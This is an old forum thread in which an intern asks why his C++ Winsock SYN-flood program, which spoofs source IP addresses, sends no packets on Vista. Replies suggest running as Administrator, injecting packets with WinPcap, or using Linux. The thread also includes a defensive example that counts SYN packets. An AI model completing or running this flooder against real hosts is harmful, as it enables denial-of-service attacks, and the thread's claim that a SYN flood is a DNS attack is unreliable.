Raw Sockets

Hello all,

Recently, I've started interning with a security firm (this is meant more to teach me than much else). My first project was to make a 'syn flooder' (a DNS attack)... So I did some research and came up with two options:

A: Send out TCP packets with false IP addresses and a SYN flag set
B: Modify the NIDS code (basically 'root kit level patching')

I went with A, so therefore I need Raw Sockets. Some more research revealed that "Raw TCP packets can't contain data". Not a problem, I think, since all I need is a header with a SYN flag and a fake IP address. (Btw, I found that semi-quote from a source on Wikipedia.)

So I test my app with Ethereal, but nothing is sent out- at all! And my error checking doesn't reveal anything... So, I am doing this in C++ w/ Visual Studio 2005 Standard, winsock2, on Vista. I have access to a virtual machine too. Also, I make sure that I'm running/debugging with administrator permissions.

*Disclaimer* I am not trying to hack anyone or anything, but merely to learn about security-wise programming *Disclaimer*

Here is some of my code. I think my error might be in my flag setting routine; I've only set the SYN flag.
```cpp
namespace SynAttacker
{
	char packetData[512]; //Max size of packet is 512 bytes
	int payloadSize = 256;
	IPV4_HDR* ipHdr=NULL;
	TCP_HDR* tcpHdr=NULL;
	hostent* hostEntity=NULL;
	sockaddr_in dest;        // destination address used below (declaration missing from the posted copy)
	unsigned short src_port;
	unsigned short dest_port;
	char* src_ip;
	char* dest_ip;
}

void SynAttacker::setUpAddresses( unsigned short src_port, unsigned short dest_port, char* src_ip, char* dest_ip )
{
	if( (hostEntity=gethostbyname(dest_ip))==0 )
		printf( "Host unresolved" );
	dest.sin_family = AF_INET;
	dest.sin_port = htons( dest_port );
	memcpy( &dest.sin_addr.s_addr, hostEntity->h_addr, hostEntity->h_length );
	SynAttacker::src_port = src_port;
	SynAttacker::src_ip = src_ip;
	SynAttacker::dest_port = dest_port;
	SynAttacker::dest_ip = dest_ip;
}

SOCKET SynAttacker::generateAndSendPacket( SOCKET s )
{
	/* A packet has TWO headers, first comes the IP portion,
	   then comes the TCP packet- since TCP is built 'on top of'
	   IP.  So I set up the IP data first, then I set up the TCP. */

	ipHdr = (IPV4_HDR *)packetData;	//lets point to the ip header portion
	ipHdr->ip_version=4;		//The version of the IP that this packet is formed for
	ipHdr->ip_header_len=5;		//The length of the IP header, in 32 bit words (4 bytes)
	ipHdr->ip_tos    = 0;
	ipHdr->ip_total_length = htons ( sizeof(IPV4_HDR) + sizeof(TCP_HDR) );
	ipHdr->ip_id     = htons(2);
	ipHdr->ip_frag_offset = 0;
	ipHdr->ip_frag_offset1 = 0;
	ipHdr->ip_reserved_zero = 0;
	ipHdr->ip_dont_fragment = 1;
	ipHdr->ip_more_fragment = 0;
	ipHdr->ip_ttl    = 8;
	ipHdr->ip_protocol = IPPROTO_TCP;
	ipHdr->ip_srcaddr  = inet_addr(src_ip);
	ipHdr->ip_destaddr = inet_addr(inet_ntoa(dest.sin_addr));
	ipHdr->ip_checksum = 0;

	tcpHdr = (TCP_HDR *)&packetData[sizeof(IPV4_HDR)]; //get the pointer to the tcp header in the packet
	tcpHdr->source_port = htons(src_port);
	tcpHdr->dest_port = htons(dest_port);
	//FLAGS- Might this be the mistake?
	tcpHdr->checksum = 0;
	//Take the address where the packet's data starts.
	//void* dataPtr = &packetData[sizeof(IPV4_HDR) + sizeof(TCP_HDR)];
	//memset(dataPtr, '^', payloadSize);

	printf( "Bytes sent: %d", sendto( s, packetData, sizeof(IPV4_HDR)+sizeof(TCP_HDR) + payloadSize, 0, (SOCKADDR*)&dest, sizeof(dest) ) );
	return s;
}
```
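An added example, not code from the thread, showing the defender's side of the layout the post describes (IPv4 header first, TCP header after it): it parses both headers out of raw bytes and counts SYN-without-ACK packets per destination address, which is the first thing an IDS looks at when deciding whether a host is being flooded. The packets are constructed inline; `parse`, `synCounts` and `makePacket` are hypothetical names.

```cpp
#include <cstdint>
#include <cstddef>
#include <map>
#include <vector>

// Fields pulled from one IPv4+TCP packet (values already in host order).
struct PacketInfo {
    bool ok = false;
    uint32_t src = 0, dst = 0;
    uint16_t sport = 0, dport = 0;
    uint8_t flags = 0;   // TCP flag byte, offset 13 of the TCP header
};

static uint16_t rd16(const uint8_t* p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t* p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }

// Parse the IPv4 header, honour its IHL, then read the TCP header behind it.
PacketInfo parse(const std::vector<uint8_t>& pkt) {
    PacketInfo info;
    if (pkt.size() < 20 || (pkt[0] >> 4) != 4) return info;          // not IPv4
    size_t ihl = (pkt[0] & 0x0F) * 4;                                 // IP header bytes
    if (ihl < 20 || pkt[9] != 6 || pkt.size() < ihl + 20) return info; // not TCP / truncated
    info.src = rd32(&pkt[12]); info.dst = rd32(&pkt[16]);
    info.sport = rd16(&pkt[ihl]); info.dport = rd16(&pkt[ihl + 2]);
    info.flags = pkt[ihl + 13];
    info.ok = true;
    return info;
}

const uint8_t TCP_SYN = 0x02, TCP_ACK = 0x10;

// Count handshake openers (SYN set, ACK clear) per destination; a flood shows
// up as one destination collecting many of these from scattered sources.
std::map<uint32_t, int> synCounts(const std::vector<std::vector<uint8_t>>& pkts) {
    std::map<uint32_t, int> counts;
    for (const auto& p : pkts) {
        PacketInfo i = parse(p);
        if (i.ok && (i.flags & TCP_SYN) && !(i.flags & TCP_ACK)) counts[i.dst]++;
    }
    return counts;
}

// Constructed sample input: a 40-byte IPv4+TCP packet, ports 12345 -> 80.
std::vector<uint8_t> makePacket(uint32_t src, uint32_t dst, uint8_t flags) {
    std::vector<uint8_t> p(40, 0);
    p[0] = 0x45; p[3] = 40; p[8] = 64; p[9] = 6;            // v4, IHL=5, len, TTL, TCP
    for (int i = 0; i < 4; ++i) { p[12 + i] = src >> (24 - 8 * i); p[16 + i] = dst >> (24 - 8 * i); }
    p[20] = 0x30; p[21] = 0x39; p[23] = 0x50;                // source 12345, dest 80
    p[32] = 0x50; p[33] = flags;                             // data offset 5, flags
    return p;
}
```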
You don't show the bit of code that creates the socket.

Try out something like this example first:

If that doesn't work, my gut feeling would be that Vista has mucked things up. Make sure you're running the program as the real Administrator.

But for serious security analysis, I wouldn't rely on such operating system APIs. I believe WinPcap allows packet injection, somewhere in the NDIS IM level.

I think my error might be in my flag setting routine, I've only set the SYN flag.

No, that's perfectly valid. IIRC, the standard TCP handshake is SYN, SYN|ACK, ACK.

Well, I've compared my code to multiple versions on the internet, and they appear to be the same---

```cpp
bool SynAttacker::initializeAttack()
{
	WSADATA wsaData;
	WORD version;
	int error;

	version = MAKEWORD( 2, 0 );

	error = WSAStartup( version, &wsaData );

	/* check for error */
	if ( error != 0 )
	{
		/* error occurred */
		return FALSE;
	}

	/* check for correct version */
	if ( LOBYTE( wsaData.wVersion ) != 2 ||
	     HIBYTE( wsaData.wVersion ) != 0 )
	{
		/* incorrect WinSock version */
		return FALSE;
	}

	return TRUE;
}

//Creates a socket
SOCKET SynAttacker::getSocket( )
{
	//Create Raw TCP Packet
	printf("\nCreating Raw TCP Socket...");
	SOCKET s = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // this line was lost from the posted copy; restored
	if(s == INVALID_SOCKET)
	{
		printf("Creation of raw socket failed.");
		return 0;
	}
	printf("Raw TCP Socket Created successfully.");
	int optval=1;
	//Put Socket in RAW Mode.
	printf("\nSetting the socket in RAW mode...");
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&optval, sizeof(optval))==SOCKET_ERROR)
	{
		printf("failed to set socket in raw mode.");
		return 0;
	}
	return s;
}
```

Yes, I run VS2005 as admin, although I doubt that this transfers over to programs running under its control, so I just compile and then navigate to the exe file w/ Windows Explorer and start it up with administrator rights.

In Vista, there's a rather important difference between "administrator rights" and the actual Administrator account. Try running it as Administrator.

But then again...if that's the problem, I'd expect error codes.

Hmmm... That seems interesting, but I have an empty partition (40 gigs) on my HD, so I was thinking of installing XP w/o any service packs-- do you think that would remove security restrictions?

While it would remove security restrictions, it would also leave the (virtual) machine vulnerable to outside attack, as WinXP was really hole-y when released. A better approach might be to install a modern Linux flavor, which doesn't have the holes, and doesn't try to prevent you from sending raw TCP packets.
